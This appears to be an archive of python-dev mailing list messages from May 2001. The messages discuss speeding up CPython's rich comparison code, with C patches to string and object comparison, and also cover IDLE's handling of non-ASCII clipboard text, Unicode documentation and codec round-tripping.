@@ -596,6 +596,51 @@
 	return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0;
 }
 
+/* In the signature, only a is guaranteed to be a PyStringObject.
+   However, as the first thing in the function, we check that b
+   is of that type also.  */
+
+static PyObject*
+string_richcompare(PyStringObject *a, PyStringObject *b, int op)
+{
+	int c;
+	PyObject *result;
+	if (!PyString_Check(b)) {
+		result = Py_NotImplemented;
+		goto out;
+	}
+	if (op == Py_EQ) {
+		if (a->ob_size != b->ob_size) {
+			result = Py_False;
+			goto out;
+		}
+#ifdef CACHE_HASH
+		if (a->ob_shash != b->ob_shash
+		    && a->ob_shash != -1 
+		    && b->ob_shash != -1) {
+			result = Py_False;
+			goto out;
+		}
+#endif
+	}
+	c = string_compare(a, b);
+	switch (op) {
+	case Py_LT: c = c <  0; break;
+	case Py_LE: c = c <= 0; break;
+	case Py_EQ: c = c == 0; break;
+	case Py_NE: c = c != 0; break;
+	case Py_GT: c = c >  0; break;
+	case Py_GE: c = c >= 0; break;
+	default:
+		result = Py_NotImplemented;
+		goto out;
+	}
+	result = c ? Py_True : Py_False;
+  out:
+	Py_INCREF(result);
+	return result;
+}
+
 static long
 string_hash(PyStringObject *a)
 {
@@ -2409,6 +2454,12 @@
 	&string_as_buffer,	/*tp_as_buffer*/
 	Py_TPFLAGS_DEFAULT,	/*tp_flags*/
 	0,		/*tp_doc*/
+	0,		/*tp_traverse*/
+	0,		/*tp_clear*/
+	(richcmpfunc)string_richcompare,	/*tp_richcompare*/
+	0,		/*tp_weaklistoffset*/
+	0,		/*tp_iter*/
+	0,		/*tp_iternext*/
 };
 
 void


From gstein at lyra.org  Tue May 15 00:17:56 2001
From: gstein at lyra.org (Greg Stein)
Date: Mon, 14 May 2001 15:17:56 -0700
Subject: [Python-Dev] Comparison speed
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
Message-ID: <20010514151755.P1374@lyra.org>

On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote:
>...
> Anybody care to take a stab at making the new richcmp and/or coerce code
> ugly again?
> 
> speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim

Euh... isn't Guido's preference for cleanliness over speed?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From tim at digicool.com  Tue May 15 00:35:33 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 18:35:33 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010514151755.P1374@lyra.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIGCAAA.tim@digicool.com>

[Greg Stein]
> Euh... isn't Guido's preference for cleanliness over speed?

So do both.


From greg at cosc.canterbury.ac.nz  Tue May 15 03:42:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 15 May 2001 13:42:49 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>:

> I also missed support for the
> relationship between identity and equality.

That would severely restrict the semantics that could be given
to the comparison operators by overloading them.
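The following present-day Python illustration shows the point. An overloaded `==` may legitimately report that an object is unequal to itself, and IEEE 754 NaN already behaves that way. A blanket "same object, so return true" rule would therefore override the type's own answer. `NeverEqual` is a hypothetical class used only for illustration:

```python
class NeverEqual:
    """Hypothetical type whose == is False even against itself."""
    def __eq__(self, other):
        return False


x = NeverEqual()
nan = float("nan")

print(x is x, x == x)          # True False
print(x != x)                  # True: the default __ne__ inverts __eq__
print(nan is nan, nan == nan)  # True False
```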

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Tue May 15 04:40:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 21:40:33 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST."
             <20010514151755.P1374@lyra.org> 
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>  
            <20010514151755.P1374@lyra.org> 
Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com>

> > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim
> 
> Euh... isn't Guido's preference for cleanliness over speed?

Yeah, Tim & I have developed a nice good-cop-bad-cop routine about
this. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 15 05:36:42 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:36:42 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> When stepping through the code, I also missed support for the
> relationship between identity and equality. E.g. in
> PyObject_RichCompare, I'd expect
>
>   if (v == w) {
>      switch (op) {
>      case Py_EQ:case Py_LE:case Py_GE:
>         Py_INCREF(Py_True);
>         return Py_True;
>      case Py_NE:case Py_LT:case Py_GT:
>         Py_INCREF(Py_False);
>         return Py_False;
>      }
>   }
>
> That would not help in your case, of course. I don't even know how
> frequent comparing identical objects is in real life - but this is
> something that PyObject_Compare has that PyObject_RichCompare
> currently doesn't.

Guido insisted (with cause <wink>) on these four pairs as being equivalent:

    x <  y  iff  y >  x
    x <= y       y >= x
    x == y       y == x
    x != y       y != x

but beyond that, in the presence of rich comparisons, agreed not to make any
other assumptions about what those pixel-bags "mean".  In particular, there's
no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies
"x != y", etc.

Applying that to the above leaves you with nothing but

   if (v == w && op == Py_EQ) /* then return Py_True */

Which is about all PyObject_Compare's

	if (v == w)
		return 0;

assumes too.  So I don't see much future in that.
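In present-day Python, the interpreter relies on the swapped pairs when the left operand declines a comparison, but it infers nothing across different operators. The sketch below demonstrates both behaviours with two hypothetical classes, `Left` and `Right`:

```python
class Left:
    def __lt__(self, other):
        return NotImplemented  # decline, so Python tries the reflection


class Right:
    def __gt__(self, other):
        return "Right.__gt__"


# x < y falls back to y > x, per the swapped pairs.
reflected = Left() < Right()

# But <= is never derived from < and ==; with no __le__/__ge__ it fails.
try:
    Left() <= Right()
    derived = True
except TypeError:
    derived = False

print(reflected, derived)
```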

[later, a patch to fill in the richcmp slot for strings]
> +static PyObject*
> +string_richcompare(PyStringObject *a, PyStringObject *b, int op)
> +{
> +	int c;
> +	PyObject *result;
> +	if (!PyString_Check(b)) {
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	if (op == Py_EQ) {
> +		if (a->ob_size != b->ob_size) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#ifdef CACHE_HASH
> +		if (a->ob_shash != b->ob_shash
> +		    && a->ob_shash != -1
> +		    && b->ob_shash != -1) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#endif
> +	}
> +	c = string_compare(a, b);
> +	switch (op) {
> +	case Py_LT: c = c <  0; break;
> +	case Py_LE: c = c <= 0; break;
> +	case Py_EQ: c = c == 0; break;
> +	case Py_NE: c = c != 0; break;
> +	case Py_GT: c = c >  0; break;
> +	case Py_GE: c = c >= 0; break;
> +	default:
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	result = c ? Py_True : Py_False;
> +  out:
> +	Py_INCREF(result);
> +	return result;

[and that yields about an 8% speedup in the "<" case]

That looks on the right track, but maybe at the wrong level:  why is it
necessary?  That is, the bulk of the "smarts" here in the switch stmt are
type-independent:  if there's no specific implementation of individual
comparisons, but there is a tp_compare, then the switch stmt applies verbatim
to *any* such type.  Do we have to fill in the richcmp slot for everything to
get Python to realize that?  I mean "just about everything", too:  while,
e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min
etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then,
but thru the general comparison routines).

The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+   which calls PyObject_RichCompare()
+     which calls do_richcmp()
+       which calls try_rich_compare() (unsuccessfully now,
                                        successfully after your patch)
          which fails to find a richcmp slot on either operand (now)
          so says "not implemented"
+       then calls try_3way_to_rich_compare()
+         which calls try_3way_compare()
+            which finally calls the tp_compare slot
+            then runs exactly the same
                 switch (op) {
                 case Py_LT: c = c <  0; break;
                 case Py_LE: c = c <= 0; break;
                 case Py_EQ: c = c == 0; break;
                 case Py_NE: c = c != 0; break;
                 case Py_GT: c = c >  0; break;
                 case Py_GE: c = c >= 0; break;
                 }
                 result = c ? Py_True : Py_False;
             switch as your patch

and things unwind.  So we've got 7 function calls there, not even counting
calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine
instructions that actually do the compare <wink>.

You got an 8% speedup for one type by tricking the switch stmt into appearing
3 calls earlier.  What if the implementation were smarter, and did it for
*all* relevant types even a call or two before that?

I don't see any reason "in principle" that compares couldn't be much faster,
and via the usual gimmicks:  bigger, smarter functions that remember what
they've already determined so don't need to figure it out over and over
again, and fast paths to favor common cases at the expense of comparisons
from Mars.  One thing to note here:  the workhorse comparisons are "like
strings" in having no *logical* need for richcmps at all; and the objects for
which richcmps were introduced were numerical arrays, which can much better
afford a longer code path to *find* them (one matrix compare will trigger
many vanilla element compares anyway, so even for arrays it's much more
important that the *latter* be fast).  The code now is approximately
backwards in that respect (it takes gobs of work before we even *look* for a
cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're
doing an explicit "cmp" compare, the code now tries to *simulate* cmp first
via a long sequence of richcmp calls!).

I don't have time to uglify this code, but Python would benefit from it.

and-no-matter-what-guido-may-say<wink>-ly y'rs  - tim


From tim.one at home.com  Tue May 15 05:50:00 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:50:00 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>

[Guido]
> Index: spam.c
> ...

Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
with "spam" in the subject line, and my mail reader moves that to a special
spam folder upon delivery.  So far this is the one and only incoming email
it's moved.  Many solicitations to help foreign nationals move large sums of
money out of their country have gotten through, along with a number of
intriguing promises that I can easily increase the size of my penis -- like I
have any need for either of those <wink>.

reads-every-spam-he-gets-top-to-bottom-ly y'rs  - tim


From esr at thyrsus.com  Tue May 15 05:53:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 23:53:38 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400
References: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <20010514235338.C663@thyrsus.com>

Tim Peters <tim.one at home.com>:
>              Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through, along with a number of
> intriguing promises that I can easily increase the size of my penis -- like I
> have any need for either of those <wink>.

What we should truly fear is the prospect that you might increase the size
of your <wink>.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The state calls its own violence `law', but that of the individual `crime'"
	-- Max Stirner


From uche.ogbuji at fourthought.com  Tue May 15 06:26:31 2001
From: uche.ogbuji at fourthought.com (Uche Ogbuji)
Date: Mon, 14 May 2001 22:26:31 -0600
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules 
 spam.c,1.1.2.3,1.1.2.4
In-Reply-To: Message from "Tim Peters" <tim.one@home.com> 
   of "Mon, 14 May 2001 23:50:00 EDT." <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com> 
Message-ID: <200105150426.f4F4QVx01531@localhost.local>

> [Guido]
> > Index: spam.c
> > ...
> 
> Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
> with "spam" in the subject line, and my mail reader moves that to a special
> spam folder upon delivery.  So far this is the one and only incoming email
> it's moved.  Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through [...]

I thought I was the only one getting all these silly Nigerian scam spams.  I 
figured maybe they saw my name and decided to test on me (though they might 
more cleverly have figured that a fellow Nigerian would be wise to the game).

However, with the (sloppily) bogus headers I've always found on those things, 
I'm surprised your ISP couldn't sniff them out.

Not that it matters.  The Eastern Nigerian proverb gets it right.

"Once hunters learn to shoot without missing, birds will learn to fly without 
resting".


-- 
Uche Ogbuji                               Principal Consultant
uche.ogbuji at fourthought.com               +1 303 583 9900 x 101
Fourthought, Inc.                         http://Fourthought.com 
4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Tue May 15 08:28:34 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 02:28:34 -0400
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEEKCAA.tim.one@home.com>

[Guido]
> Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

[Martin]
> Perhaps the Tcl version? That sounds like the issue that Marc talked
> about: Tk behaves differently when text is entered programmatically
> (and perhaps through cut-n-paste), as compared to text entered through
> the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
> Solaris 8 still gives me the UnicodeError.

I don't know which version of Python Guido used.  I tried cut-&-paste of

    s='äö'

from his email into the distributed 2.1 IDLE under Win98, and got

    UnicodeError: ASCII encoding error: ordinal not in range(128)
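The message reports that a character above code point 127 could not be encoded as ASCII. The same two characters (U+00E4 and U+00F6, the bytes in Guido's '\xe4\xf6') can be reproduced in present-day Python, where `str` is Unicode: they encode cleanly to Latin-1 but fail under ASCII. `ascii_check` is a hypothetical helper:

```python
def ascii_check(text: str) -> str:
    """Return 'ok' if text is pure ASCII, else the codec's error reason."""
    try:
        text.encode("ascii")
        return "ok"
    except UnicodeEncodeError as exc:
        return exc.reason


s = "\u00e4\u00f6"              # the two characters in s='äö'
print(s.encode("latin-1"))      # b'\xe4\xf6'
print(ascii_check(s))           # ordinal not in range(128)
```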

Tk appears to interfere with using the usual Windows ALT+0nnn method of
entering funny characters, so I'm unsure what happens then -- but for me it
either works fine or does something insane (moves the cursor to the left
margin, brings up an IDLE dialog box, etc).

If I open the system Character Map utility and copy-&-paste using *that*, I
can enter all sorts of stuff without problem:

>>> s = "àáâãäåæçèéêëìíîïðñòòóôõö÷øùúûüýþÿ"
>>> s
'\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
>>>

So not all clipboard entries are created equal.

Another clue:  if I paste the s='äö' snippet from Guido's email into a file
opened with Notepad, then immediately copy it again from the Notepad doc,
then paste that into Idle, again no problem:

>>> s='äö'
>>> s
'\xe4\xf6'
>>>

Using a clipboard diagnostic tool I don't understand, when I copy from
Notepad these data formats are in the system clipboard:

    TEXT
    LOCALE
    OEMTEXT

But when I copy from Guido's email under Outlook 2000, it's

    DataObject
    Rich Text Format
    Rich Text Format Without Objects
    RTF as Text
    TEXT
    UNICODTEXT
    Ole Private Data
    LOCALE
    OEMTEXT

Under Character Map, it's

    Rich Text Format
    TEXT
    LOCALE
    OEMTEXT

So perhaps it's not the version of Tk but the source of the data, and that Tk
grabs an unfortunate data format (when present) from the clipboard in
preference to a fortunate one.

the-clipboard-is-a-complex-beast-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 08:44:23 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 08:44:23 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>

> Applying that to the above leaves you with nothing but
> 
>    if (v == w && op == Py_EQ) /* then return Py_True */
> 
> [...] So I don't see much future in that.

Is this really exactly what Python would guarantee? I'm surprised that
x==x would always be true, but x!=x might be true also. In a type where
x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
I had expected that you'd reduced it to

  if (v == w && op == Py_EQ) /* then return Py_True */
  if (v == w && op == Py_NE) /* then return Py_False */

The one application where this may help is list_contains, in
particular when searching a list of interned strings.
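Present-day CPython applies the same two shortcuts Martin lists (same object: `Py_EQ` is true, `Py_NE` is false) inside `PyObject_RichCompareBool`, which list containment and list equality use. As a result, an element can be found in a list even when it does not compare equal to itself. NaN makes this visible:

```python
nan = float("nan")

self_equal = (nan == nan)        # False: NaN is unequal to itself
found = nan in [nan]             # True: identity is checked first
lists_equal = [nan] == [nan]     # True: same shortcut, element by element
print(self_equal, found, lists_equal)
```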

> You got an 8% speedup for one type by tricking the switch stmt into
> appearing 3 calls earlier.  What if the implementation were smarter,
> and did it for *all* relevant types even a call or two before that?

Please have a look at the patch below. Since I did a CVS update after
yesterday's run, I had to redo the baseline measurements:

0.790
0.780
0.770
0.780
0.780
0.790
0.780
0.790
0.790
0.790

The patch moves the case "equal types, supporting cmp" to somewhat
earlier, just after the attempt to do richcompare. Now I get

0.760
0.770
0.750
0.770
0.750
0.750
0.760
0.760
0.760
0.760

So while there is some saving, this is not as good as implementing
richcompare.

> I don't see any reason "in principle" that compares couldn't be much
> faster, and via the usual gimmicks: bigger, smarter functions that
> remember what they've already determined so don't need to figure it
> out over and over again, and fast paths to favor common cases at the
> expense of comparisons from Mars.

I agree "in principle" :-) However, you cannot move the case "equal
types, implementing tp_compare" before the case "one of them
implements tp_richcompare" without changing the semantics. 

The change here is what you'd do when you have both richcmp and
oldcomp; Python clearly mandates using richcmp. In case this is not
obvious (it wasn't to me): UserList will complain about using the
deprecated __cmp__, and dictionaries will iterate over their elements
differently.

Given that richcomp has to be tried first, this patch does the "common
case" at the earliest possible time, and with no overhead except for
the PyErr_Occurred call.
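
The dispatch order the patch aims for can be modeled in a few lines of Python 3. This is a toy model under stated assumptions, not CPython's code: `ToyType`, its `rich`/`cmp3` fields (standing in for `tp_richcompare`/`tp_compare`) and `fallback_compare` are hypothetical, only the left operand's rich slot is tried, and coercion is reduced to a fixed ordering by type name.

```python
from dataclasses import dataclass
from typing import Callable, Optional

# Hypothetical operator codes mirroring Py_LT .. Py_GE.
LT, LE, EQ, NE, GT, GE = range(6)


def convert_3way_to_object(op: int, c: int) -> bool:
    """Turn a 3-way result (<0, 0, >0) into the answer for one rich operator."""
    return {LT: c < 0, LE: c <= 0, EQ: c == 0,
            NE: c != 0, GT: c > 0, GE: c >= 0}[op]


@dataclass
class ToyType:
    name: str
    rich: Optional[Callable] = None  # stands in for tp_richcompare
    cmp3: Optional[Callable] = None  # stands in for tp_compare


@dataclass
class ToyObject:
    kind: ToyType
    value: object


def fallback_compare(v: ToyObject, w: ToyObject, op: int) -> bool:
    # Placeholder for coercion + default_3way_compare: order by type name.
    a, b = v.kind.name, w.kind.name
    return convert_3way_to_object(op, (a > b) - (a < b))


def do_richcmp(v: ToyObject, w: ToyObject, op: int) -> bool:
    # 1. Rich comparison must win whenever it is implemented.
    if v.kind.rich is not None:
        res = v.kind.rich(v, w, op)
        if res is not NotImplemented:
            return res
    # 2. Common case: same type with a 3-way compare, so skip coercion.
    if v.kind is w.kind and v.kind.cmp3 is not None:
        return convert_3way_to_object(op, v.kind.cmp3(v, w))
    # 3. Everything else goes through the slow generic path.
    return fallback_compare(v, w, op)


# An int-like type with only a 3-way compare takes the fast path.
INT = ToyType("int", cmp3=lambda a, b: (a.value > b.value) - (a.value < b.value))
# A NaN-like type whose rich slot overrides what cmp3 would say.
NAN = ToyType("nan", rich=lambda a, b, op: op == NE, cmp3=lambda a, b: 0)
```

The NaN-like type shows why step 1 cannot be moved after step 2 without changing semantics: its `cmp3` would report equality, but its rich slot must be honored.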

So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT
TP_RICHCOMPARE (sorry for shouting). If you think the extra work for
type implementors is not acceptable, we can offer a convenience
function that everybody implementing tp_compare can put into
tp_richcompare. For strings, I would still special-case
tp_richcompare: when tracing calls to string_richcompare, I found that
most calls with Py_EQ can be decided by checking that the string
lengths are not equal. This is all "bigger, faster functions" put to
work.
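
Martin's ordering of cheap checks for string equality can be sketched in Python 3 as below. `str_eq_fast` is a hypothetical helper for illustration only; CPython's real string comparison lives in C and differs in detail.

```python
def str_eq_fast(a: str, b: str) -> bool:
    """Equality test ordered from the cheapest check to the costliest."""
    if a is b:              # identical objects, e.g. interned strings
        return True
    if len(a) != len(b):    # different lengths can never be equal
        return False
    if a[:1] != b[:1]:      # the first character settles many mismatches
        return False
    return a == b           # full comparison (memcmp in the C version)
```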

Regards,
Martin

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -u -r2.131 object.c
--- object.c	2001/05/11 03:36:45	2.131
+++ object.c	2001/05/15 06:16:53
@@ -477,16 +477,6 @@
 	if (PyInstance_Check(w))
 		return (*w->ob_type->tp_compare)(v, w);
 
-	/* If the types are equal, don't bother with coercions etc. */
-	if (v->ob_type == w->ob_type) {
-		if ((f = v->ob_type->tp_compare) == NULL)
-			return 2;
-		c = (*f)(v, w);
-		if (PyErr_Occurred())
-			return -2;
-		return c < 0 ? -1 : c > 0 ? 1 : 0;
-	}
-
 	/* Try coercion; if it fails, give up */
 	c = PyNumber_CoerceEx(&v, &w);
 	if (c < 0)
@@ -590,15 +580,21 @@
    -1 if v < w;
     0 if v == w;
     1 if v > w;
+   If the object implements a tp_compare function, it returns
+   whatever this function returns (whether with an exception or not).
 */
 static int
 do_cmp(PyObject *v, PyObject *w)
 {
 	int c;
+	cmpfunc f;
 
 	c = try_rich_to_3way_compare(v, w);
 	if (c < 2)
 		return c;
+	if (v->ob_type == w->ob_type
+	    && (f = v->ob_type->tp_compare) != NULL)
+		return (*f)(v, w);
 	c = try_3way_compare(v, w);
 	if (c < 2)
 		return c;
@@ -760,16 +756,9 @@
 }
 
 static PyObject *
-try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+convert_3way_to_object(int op, int c)
 {
-	int c;
 	PyObject *result;
-
-	c = try_3way_compare(v, w);
-	if (c >= 2)
-		c = default_3way_compare(v, w);
-	if (c <= -2)
-		return NULL;
 	switch (op) {
 	case Py_LT: c = c <  0; break;
 	case Py_LE: c = c <= 0; break;
@@ -782,16 +771,46 @@
 	Py_INCREF(result);
 	return result;
 }
+	
 
 static PyObject *
+try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+{
+	int c;
+
+	c = try_3way_compare(v, w);
+	if (c >= 2)
+		c = default_3way_compare(v, w);
+	if (c <= -2)
+		return NULL;
+	return convert_3way_to_object(op, c);
+}
+
+static PyObject *
 do_richcmp(PyObject *v, PyObject *w, int op)
 {
 	PyObject *res;
+	cmpfunc f;
 
+
 	res = try_rich_compare(v, w, op);
 	if (res != Py_NotImplemented)
 		return res;
 	Py_DECREF(res);
+
+	/* If the types are equal, don't bother with coercions etc. 
+	   Instances are special-cased in try_3way_compare, since
+	   a result of 2 does *not* mean one value being greater
+	   than the other. */
+	if (v->ob_type == w->ob_type
+	    && !PyInstance_Check(v)
+	    && (f = v->ob_type->tp_compare) != NULL) {
+		int c;
+		c = (*f)(v, w);
+		if (PyErr_Occurred())
+			return NULL;
+		return convert_3way_to_object(op, c);
+	}
 
 	return try_3way_to_rich_compare(v, w, op);
 }


From tim.one at home.com  Tue May 15 09:33:06 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:33:06 -0400
Subject: [Python-Dev] Unicode docs
In-Reply-To: <3AFFA23F.248517E3@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>

I don't know that the Unicode docs need massive work, but the docs that are
there simply don't answer the technical questions people have:  they're too
thin.

Let's keep it simple.  Contrast the Library manual's:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding. Error handling is
    done according to errors. The default behavior is to decode UTF-8
    in strict mode, meaning that encoding errors raise ValueError. See
    also the codecs module.

with Andrew's description (from http://www.amk.ca/python/2.0/):

    unicode(string [, encoding] [, errors])
    Creates a Unicode string from an 8-bit string. encoding is a
    string naming the encoding to use. The errors parameter specifies
    the treatment of characters that are invalid for the current
    encoding; passing 'strict' as the value causes an exception
    to be raised on any encoding error, while 'ignore' causes errors
    to be silently ignored and 'replace' uses U+FFFD, the official
    replacement character, in case of any problems.

The latter addresses several *fundamental* questions untouched by the former,
like what are the datatypes of the arguments and the result, what values does
errors accept, and what do they mean?  The first blurb answers some more,
like what's the default encoding, and which exception is raised?  Neither is
complete on its own, but the reference manual should have a complete answer
to all such questions.  It doesn't have to go on at great length.

A round-trip example would be invaluable.
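
A round-trip example of the kind Tim asks for, written for present-day Python 3, where `unicode(string, encoding, errors)` is spelled `bytes.decode(encoding, errors)` or `str(bytes, encoding, errors)`. It is a sketch of the documented behavior, not text from the manual of the time.

```python
text = "abc\u00e4\u00f6\u00fc"            # 'abcäöü'
data = text.encode("utf-8")               # str -> bytes
assert data.decode("utf-8") == text       # bytes -> str: lossless round trip

raw = b"abc\xe4"                          # Latin-1 bytes; not valid UTF-8
try:
    raw.decode("utf-8")                   # errors="strict" is the default
except UnicodeDecodeError as exc:         # a subclass of ValueError
    strict_reason = exc.reason
else:
    strict_reason = None

ignored = raw.decode("utf-8", errors="ignore")    # invalid bytes dropped
replaced = raw.decode("utf-8", errors="replace")  # invalid bytes -> U+FFFD
latin = str(raw, "latin-1")                       # Python 3 form of unicode(s, enc)
```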

If Fred wanted to incorporate a brief overview too, a light rework of
Andrew/Moshe's writeup would be an excellent start.


From tim.one at home.com  Tue May 15 09:47:16 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:47:16 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>

[M.-A. Lemburg]
> The problem is: which part would raise the exception -- the
> encoder or the decoder ?

Since I don't yet use any of this stuff for real, I have no idea:  seems
mostly a question of pragmatics, and I don't have any feel for how cp875
users would view it.

> Here are some more options:
>
> * sort the items before creating the encoding table from the
>   decoding one (makes the mapping stable)

If users don't care that round-trip can fail silently, fine.

> * map keys which have multiple mappings in the encoding table
>   to None -- this causes their usage to raise an exception
>   (undefined mapping)

If users don't care that they'll get an exception when they try something
that can't be round-tripped, fine.  Or would this depend on the value of the
"errors" argument too?  Then it's easier to impose.

There's a theme here <wink>:  I have no idea how important roundtrip is in
Unicode Practice, or even that it's a constant across apps and encodings.  If
I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
wouldn't care that I can't get "love" back from u"kaka" <wink>.
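
Tim's joke codec is easy to write down, and it shows concretely why such a mapping cannot round-trip: distinct inputs collapse onto one output. `kaka` is a hypothetical toy, not a real codec.

```python
import string

VOWELS = set("aeiou")


def kaka(word: str) -> str:
    """Toy lossy 'codec': ASCII vowels -> 'a', other ASCII letters -> 'k'."""
    out = []
    for ch in word.lower():
        if ch in VOWELS:
            out.append("a")
        elif ch in string.ascii_lowercase:
            out.append("k")
        else:
            out.append(ch)          # everything else passes through unchanged
    return "".join(out)


# Several inputs map to the same output, so no decoder can recover them.
assert kaka("love") == kaka("like") == "kaka"
```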


From mal at lemburg.com  Tue May 15 10:19:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:19:06 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <3B00E67A.C5769082@lemburg.com>

Tim Peters wrote:
> 
> I don't know that the Unicode docs need massive work, but the docs that are
> there simply don't answer the technical questions people have:  they're too
> thin.

As much as I would like to work on this, I simply don't have the
time... if someone wants to contribute more detailed docs, though,
I'd be glad to review them and answer remaining questions.

Note that I will give a talk at the upcoming Bordeaux conference about
Python and Unicode. The slides will eventually go online after
the conference (in July). BTW, are any python-devs attending the
conference (they have some great wine in that part of France ;-) ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May 15 10:32:14 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:32:14 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>
Message-ID: <3B00E98E.1C44FF5@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > The problem is: which part would raise the exception -- the
> > encoder or the decoder ?
> 
